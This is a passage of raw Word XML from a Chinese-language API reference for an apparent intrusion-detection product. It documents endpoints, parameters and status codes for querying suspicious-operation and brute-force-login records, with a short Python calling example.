              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EED583A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑操作类型，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="可疑操作类型">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>可疑操作类型</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62E835B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0077834F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F528C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F28F6F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1196D7F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1592CC03" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0161612F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FDA084B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A7CCBE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A7847E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="783DC2C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA95AB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B091CB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="579F0E84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BFCB1CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>审核状态，1:未审核 2:审核通过 3:审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7465A301" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B5A6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#入侵检测-可疑操作-查询结果接口调用的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def shelllog_list():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/detect/shelllog/linux?page=0&amp;size=50&amp;groups=1,2" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page': 0, 'size': 50, 'groups': '1,2'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C389ADA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="暴力破解"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:r>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="查询结果-2"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686678C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E334D8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/brutecrack/{linux,win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132A7A2"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331"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="954"/>
        <w:gridCol w:w="6524"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7031135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F55DF66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C6814F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF8F116" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C45E363" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="001CD673" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25BF2022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30408F32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C238A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3103F6B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A577034" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5BB8F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D2D41C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D20273E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758E2CBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F1290F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37786C68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serviceType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E3B2BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="374CD826" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0CFB54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型， Linux: 1:SSHD 2:VSFTPD Windows: 100:RDP 101:WINRM 102:SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5360C29F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06505091" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522F6F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D40931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617151EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="暴力破解封停状态">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>暴力破解封停状态</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13E9CA09" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421724AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE6F5AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136B350E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12DF19B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D94D446" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF8853A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1BC042" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72AB9B09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C679A3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击目标（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E6A96CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A07187" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="032FF155" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="614A0093" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0503AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A283507" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>封停状态字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="423"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="17B5908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3871F5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71CB1A1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22D23F87" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B760AF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A8F9EF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="204FB294" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76DBD0B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E20E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6908095D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C82A8D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B94081D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0865A19A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="745C23E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDA3D12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>手动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A1DD8F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF53E0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045A5FE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>手动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B1F65F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0619507A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14311C82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解封中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1DB99F88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E96A9AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F7B3CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1941BAFF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7529F8FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6642519C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DCE4DE1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09AF7CA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4D554E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解封失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E8E8196" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E30F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/brutecrack/linux?page=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6778FC32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276FF829" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
